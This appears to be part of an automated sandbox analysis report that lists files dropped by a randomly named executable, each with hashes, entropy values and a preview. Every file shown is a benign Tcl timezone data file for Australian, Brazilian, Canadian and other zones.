                                                                                                                                                                                                                              SHA-256:FC1B54CA261074E47A8A486FEAC12DD04D46166D1D2B44163BD8791BEC32D275
                                                                                                                                                                                                                              SHA-512:20BDFBCD1A5038C81552EBD955F3921DE3447A1F30E64935937768B2B98735AE53049601DCDD2D519646C78E6D03289EB465CFF4F2DADEA7D89A329504C6C475
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Perth) {.. {-9223372036854775808 27804 0 LMT}.. {-2337925404 28800 0 AWST}.. {-1672552800 32400 1 AWDT}.. {-1665381600 28800 0 AWST}.. {-883634400 32400 1 AWDT}.. {-876117600 28800 0 AWST}.. {-860392800 32400 1 AWDT}.. {-844668000 28800 0 AWST}.. {-836470800 32400 0 AWST}.. {152042400 32400 1 AWDT}.. {162928800 28800 0 AWST}.. {436298400 32400 1 AWDT}.. {447184800 28800 0 AWST}.. {690314400 32400 1 AWDT}.. {699386400 28800 0 AWST}.. {1165082400 32400 1 AWDT}.. {1174759200 28800 0 AWST}.. {1193508000 32400 1 AWDT}.. {1206813600 28800 0 AWST}.. {1224957600 32400 1 AWDT}.. {1238263200 28800 0 AWST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):203
                                                                                                                                                                                                                              Entropy (8bit):4.803539644461131
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIaWhSHAIgPWAvN/2DCoRWJvFBx+DC7WN:MByMjL9t2rOvFel
                                                                                                                                                                                                                              MD5:401B6B2E30EF17BE20212645287EB94B
                                                                                                                                                                                                                              SHA1:67D15A45C61122CE680B829FE0FA3A1C501A8C8F
                                                                                                                                                                                                                              SHA-256:DDA669B9BFB3E08FC23CE67030148B9E4740824ADD8DE02580D6AFD31CE05BAB
                                                                                                                                                                                                                              SHA-512:F4348F8F4FF261C47854725AEE4E14E7E334B3C31496E5C46B0E0041551CB6861380E684E8888AFE9DA7E8E97236AC322B9CE2738EF245E9D46C9681665F83A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Brisbane)]} {.. LoadTimeZoneFile Australia/Brisbane..}..set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):198
                                                                                                                                                                                                                              Entropy (8bit):4.752918480727309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIDRpGSHAIgSRrN/2DCa7QDCuRpyn:MByMjdpQYrt23QHpy
                                                                                                                                                                                                                              MD5:D226A0718185854DFE549E00856AA8D5
                                                                                                                                                                                                                              SHA1:94EE96FAE259D90C2FDF169DD95BD82B3171FFAE
                                                                                                                                                                                                                              SHA-256:D9DCFDC377901EC0C0FEB9CEA743C2C1425273F69A1BAA7BF3B74FEC5885B267
                                                                                                                                                                                                                              SHA-512:7EE29A7235CAAEF4889246B7A2241CA9A0D5D2B2E1D56B20141247C93B8736F17280F0D46004AC4588E137D1E76F661C779C906BBFC2B5F8FA73C19F7657F952
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Adelaide)]} {.. LoadTimeZoneFile Australia/Adelaide..}..set TZData(:Australia/South) $TZData(:Australia/Adelaide)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8338
                                                                                                                                                                                                                              Entropy (8bit):3.847525715050911
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:AZJigk42/yn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:AZJuVnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:C0F1776E011C4C86B7709A592E7CA1EB
                                                                                                                                                                                                                              SHA1:1CA528D529BF4995E145D6E0D87A8752A3577E7F
                                                                                                                                                                                                                              SHA-256:FC453486325ADE1D31F14087B76D4936F3A6D551ABD1DB6FCAC129BDB043951C
                                                                                                                                                                                                                              SHA-512:F872182962C2615A35F012ECAB30C88F07C6BEF0261207AD52706DB22D8CDD0DA65723CD801FDA7C548C5EB0ECFC39DD66CC17503BAA3BBB77BFA35D20650E4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Sydney) {.. {-9223372036854775808 36292 0 LMT}.. {-2364113092 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.777331394201868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DC3neDCVDy:MByMjUQVv8At2+eKy
                                                                                                                                                                                                                              MD5:9C58D9EFBB03472BBDA76CE2FFAD4BB4
                                                                                                                                                                                                                              SHA1:30959E3681B64AE26F7FA3957887896C26AF7F19
                                                                                                                                                                                                                              SHA-256:C94FA7A7640CD00963EE8FF1A3D9DCDA2075408739D998EDBF7CFC998DB764FD
                                                                                                                                                                                                                              SHA-512:2D6B778217726691F2CB4A4995A8B1AB08DDB7FE4570A3FD04EF54F718F455EF3CBD4EEF1A1BCC99A2088C82A6E89DB455BAF1327CECD6BF608837E50F14A6C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.818875198673406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIvFfkSHAIgoFNNvN/2DCzyQDCMF4:MByMj9fKaNNvt2xQz4
                                                                                                                                                                                                                              MD5:0B144A2E47C81354BC510BC741DE5150
                                                                                                                                                                                                                              SHA1:A7396F1741F02C6C208FD1286362E4E0720198B8
                                                                                                                                                                                                                              SHA-256:DBEF9C5BDD290FEC5FA740D697143332D3CA1FC373CF1DF736F1883AC9BA3298
                                                                                                                                                                                                                              SHA-512:562B029591F9ADB8C324BA56E849B2B524E91B26D3DB441510194882A8E1E63E6948D041874A00A0A76F29925A1CEAC53DD2AE5D7F23123B6FE919346CBFD8CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Melbourne)]} {.. LoadTimeZoneFile Australia/Melbourne..}..set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.831654343064909
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjXFeyXHAIgoXjrWARL/2QWCCjH0QWCCjQ:SlSWB9vsM3yInHAIgOWAN/2DC00DCt
                                                                                                                                                                                                                              MD5:5F5916CB038876BE27AA5E2AD74EE085
                                                                                                                                                                                                                              SHA1:18AC21B638188B542455BA3DA91F958DF1724E68
                                                                                                                                                                                                                              SHA-256:75ABB7F20C4A0B618138AA190AF33CEAF2A6D2C707DA6C1314E4BFF2F9904F58
                                                                                                                                                                                                                              SHA-512:ADFD83E292AC1BB5E19255A9B2DA0E3BB9323A5F9B92D458DE34C291D7F9B6CFBBF62AA3351FB320E54F34305DD485ADC72134D21AFA6A27B2B8B7D93DCA2113
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Perth)]} {.. LoadTimeZoneFile Australia/Perth..}..set TZData(:Australia/West) $TZData(:Australia/Perth)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):212
                                                                                                                                                                                                                              Entropy (8bit):4.918079927018121
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIcKlHAIgJK3N/2DCkuM0DC9KM:MByMjcKeJK3t2kVSKM
                                                                                                                                                                                                                              MD5:BEDEA56FCE4B2F0A3F3E9319856A5560
                                                                                                                                                                                                                              SHA1:9FD0FE998A003C6B4CCCD00A977153347DE07F55
                                                                                                                                                                                                                              SHA-256:55A9264D0414644A1BE342106AE86086A6659596DC9322A74FC4D1DDB41F7C60
                                                                                                                                                                                                                              SHA-512:7C438B72262B99EDEEB31AC95E0135BB722A3B0B049278B6DE67DB5FB501837FB9C03785233B538E83F4B56104F6EA3B3DA0F7C2275E0F78F232161840AA4C63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Broken_Hill)]} {.. LoadTimeZoneFile Australia/Broken_Hill..}..set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.888429541699473
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/xWh490th4:MByMYdIp7tQ490I
                                                                                                                                                                                                                              MD5:A8A7A10DA4321819ED71F891480770F8
                                                                                                                                                                                                                              SHA1:930674EF7711542D7F471A59C1870D4576E027FD
                                                                                                                                                                                                                              SHA-256:2F594239A434052D36053A2B3EAB134EADBAD06EB6737E67CF72166DAB157537
                                                                                                                                                                                                                              SHA-512:C6AD1869A713DDE0E4DE53F7894E5CE0B7AEFDDD7C5C3D83BB5B92FB7D8E20B373A6694045053E1AE8EA98A7B7D0C052EF2C21310E47DC650A7A399A5F73D586
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.875339623736144
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wKy4oeyXHAIg20wKARL/1bIAJl0IAcGEwKyovn:SlSWB9vsM3y7/rDSHAIgp/AN/xIAE90j
                                                                                                                                                                                                                              MD5:E0D0EFBEC37E27532B49FF6DD9893DA0
                                                                                                                                                                                                                              SHA1:9C00993A885AF448E48201A46E17629A7A602FC6
                                                                                                                                                                                                                              SHA-256:A676562A90FF8587A775F6F0E3BE05D870456A56D25B5330816BF9043C8D475B
                                                                                                                                                                                                                              SHA-512:AB0E6907F9C0002CA5C050A0069AF013B14BADA08CA4553C96B302C078DF7629D5D7EDE4A19A53DEC6E7B9E6D9857F14EC7A1DB9BC11F2EEC9FFBAC70E129EEE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Noronha)]} {.. LoadTimeZoneFile America/Noronha..}..set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.948480276987682
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0tQJXveyXHAIg20tQJE6RL/1bJHIAcGEtQJXy:SlSWB9vsM3y7tIGSHAIgpt36N/xR90tF
                                                                                                                                                                                                                              MD5:FCCB5F44903E1B988A058E5BBF5E163B
                                                                                                                                                                                                                              SHA1:E1CC03DD4A804C7305D8B0C12D8451D08AE262EA
                                                                                                                                                                                                                              SHA-256:961FB3AB99A63B1E9704B737EAB2D588B5A39D253A213E175CC678BEDFFD498D
                                                                                                                                                                                                                              SHA-512:F31C80E4AD6EBE6CB8A3382E0052DC47601D073E8F81375D50241105675AA3AB45433FFD0534524D9992ABE1086C6671D85FF7C72B0D6766EB9984426F608B77
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Sao_Paulo)]} {.. LoadTimeZoneFile America/Sao_Paulo..}..set TZData(:Brazil/East) $TZData(:America/Sao_Paulo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.902113962502196
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0znQZF3vXHAIg20znQv5RL/1bbAWVIAcGEznQe:SlSWB9vsM3y7zn+PHAIgpznSN/xn90zN
                                                                                                                                                                                                                              MD5:9F4B43F4F27D0B7EAC0C5401A1A794B4
                                                                                                                                                                                                                              SHA1:2A8543B994E93E54BD50EAA78463905E6A8EBE74
                                                                                                                                                                                                                              SHA-256:0500C9A248C8CE9030EA30D0AF9DD95DC465480BAF60646C0B7C511FA23C6D1F
                                                                                                                                                                                                                              SHA-512:0ADAF708ACFBD80F4704951EEBC24AD144FD5856997A429279E804F3A7F7F9A8FED41DCEE85BFB1ECDBF1E05137E87E7430186474BCF5DE42067FFC74746F048
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Manaus)]} {.. LoadTimeZoneFile America/Manaus..}..set TZData(:Brazil/West) $TZData(:America/Manaus)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7736
                                                                                                                                                                                                                              Entropy (8bit):3.7984816540097843
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:09+xKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt7:9Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:6DB983AD72FB2A88FC557BE5E873336F
                                                                                                                                                                                                                              SHA1:C64E988010087ED559A990B3D95078949C9B4D72
                                                                                                                                                                                                                              SHA-256:E2AEA7CFD428A43D9DB938BCC476623ADC1250BD8057013A7FFF5F89D7FF8EFC
                                                                                                                                                                                                                              SHA-512:C0A646F80FB2FD42D9146A4FD36CF5A7F62016684F8D5AF80453EC190F4AEA65EDADC5BCF071AE746ABFB43B29C27B2743F2152B6986D41BFDE1617CA774A7C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CET) {.. {-9223372036854775808 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766623600 3600 0 CET}.. {228877200 7200 1 CEST}.. {243997200 3600 0 CET}.. {260326800 7200 1 CEST}.. {276051600 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}.. {323830800 7200 1 CEST}.. {338950800 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):3.8095769056779916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:e3HgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:eQaUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:A6F88C55E8613A27DE3E6C25B0672910
                                                                                                                                                                                                                              SHA1:3B593CC17BF153A6209FC5AACE7B88DA9603BD44
                                                                                                                                                                                                                              SHA-256:73A9841F233AA657AFB6CED8A86A37D55FE5582DD996B9B28975D218BCCC078F
                                                                                                                                                                                                                              SHA-512:526A922B1594A2800B03F363F7BFEC29203D4A4F2B49C5F2618469F59176CE4F8AFBA0616B226AC39D308DB05DE7147714D9B6CDBB2EA7373A041A4D47F50E2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CST6CDT) {.. {-9223372036854775808 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-84384000 -18000 1 CDT}.. {-68662800 -21600 0 CST}.. {-52934400 -18000 1 CDT}.. {-37213200 -21600 0 CST}.. {-21484800 -18000 1 CDT}.. {-5763600 -21600 0 CST}.. {9964800 -18000 1 CDT}.. {25686000 -21600 0 CST}.. {41414400 -18000 1 CDT}.. {57740400 -21600 0 CST}.. {73468800 -18000 1 CDT}.. {89190000 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.804821796604604
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx02NEO/vXHAIg202NEqA6RL/0nalGe2IAcGE2NEOyn:SlSWB9vsM3y7UEOXHAIgpUEqA6N/0af9
                                                                                                                                                                                                                              MD5:33A04963E70EBF29339204348E0DF874
                                                                                                                                                                                                                              SHA1:456C0DB88ECE4D180EEE5AE5AEF5FBEB6E977D00
                                                                                                                                                                                                                              SHA-256:6DC6354D761CBE7820C9186568CAB87AD48CA925507F6A740357195B60E16D87
                                                                                                                                                                                                                              SHA-512:DF8F46827760BD7EC922C6837E0B6649B4FBD220B79E6F1B67FE3DD8CB3D2D035ECDAF4CF6CE5BDE6DC79C6F7B6EE2B9787AF08A97845CD0D647720A2E78D7EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Halifax)]} {.. LoadTimeZoneFile America/Halifax..}..set TZData(:Canada/Atlantic) $TZData(:America/Halifax)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.863241040396457
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0po/vXHAIg20puFvHRL/0nPQox/h4IAcGEpoyn:SlSWB9vsM3y7pYHAIgppuRN/0d490pl
                                                                                                                                                                                                                              MD5:97E50CE9FBA3F1A6DFCF333F9E6D592C
                                                                                                                                                                                                                              SHA1:EE472C411079E788DBF32FAC9C5B7EE121960DC2
                                                                                                                                                                                                                              SHA-256:DB32E83949D62478D229E9FB57BB1624D21B3A9CCEE4CD55335F8262C01D820A
                                                                                                                                                                                                                              SHA-512:D547E3DC03848A677BE67F7CF4124E067F76EE09BB724A5B10F028BEA72C1526B17678A035B2C53F69498E9ECAACD3C5445D42B7FE58DF706DD2C5F2ADA05A73
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Winnipeg)]} {.. LoadTimeZoneFile America/Winnipeg..}..set TZData(:Canada/Central) $TZData(:America/Winnipeg)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.758562813220951
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/0nbHboxp4IAcGEqM:SlSWB9vsM3y7RQtHAIgpRQPN/0Dboxpp
                                                                                                                                                                                                                              MD5:4365BEFA3D50EEE20843EF97A095E512
                                                                                                                                                                                                                              SHA1:7756049B4CD6459742686925E9516E64A9727306
                                                                                                                                                                                                                              SHA-256:22844994AE893F3236A091B050E932E84A5218EC0D01F72595E17CCC471FA564
                                                                                                                                                                                                                              SHA-512:CB265E79DF926026BEBF7158590369ABE5353C759540F509ABBA2A7ADBE59A705BC2AB936F400614BE610EDB761DE9A2B1E179A0A8B0A87E595392362C2516AA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:Canada/Eastern) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.8181126338833655
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx07nKL50vXHAIg207nKLyRRL/0nNYLo/4IAcGE7nK1:SlSWB9vsM3y77G2HAIgp7bN/0W8/4908
                                                                                                                                                                                                                              MD5:FA0D0024AD72CCE4EC7229FA897FB1B7
                                                                                                                                                                                                                              SHA1:4373A07F2674FE974189CC801987652AA97F0204
                                                                                                                                                                                                                              SHA-256:D7A203E60FF19DCDEAAD14121720DE51DA73392D25B40FFA301C1935CDF89517
                                                                                                                                                                                                                              SHA-512:82EF7F429604A69734B04D298B4C9C9AC3BE57B9DD8C4CECF59C7AB3470BDFBA0505886C4E6AA3864F5EC7FBB4C69C54CF153A6417376828234833013C29A0C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Edmonton)]} {.. LoadTimeZoneFile America/Edmonton..}..set TZData(:Canada/Mountain) $TZData(:America/Edmonton)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):196
                                                                                                                                                                                                                              Entropy (8bit):4.998628928230972
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7tgYJHAIgptVN/0xdBx+90twv:MByMYnKpTt590g
                                                                                                                                                                                                                              MD5:A2DCCB8BFC65DD4E7C3BB7F10DCEFF11
                                                                                                                                                                                                                              SHA1:6FD2F4FAE06C5D4D3F189A167A98AA76497569DD
                                                                                                                                                                                                                              SHA-256:87F42F45FD7D059CA47650D445420DE8320F3A7C1CBC7671FBFA8A8881274433
                                                                                                                                                                                                                              SHA-512:F42E32C5BD785BA914E5054784BF67DDF951460A708290D1899621CEEDC63475B584FC052A86A3B6D45BF3C651D42427FB6F9CE2A2A33764DFFF731053BECC16
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/St_Johns)]} {.. LoadTimeZoneFile America/St_Johns..}..set TZData(:Canada/Newfoundland) $TZData(:America/St_Johns)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
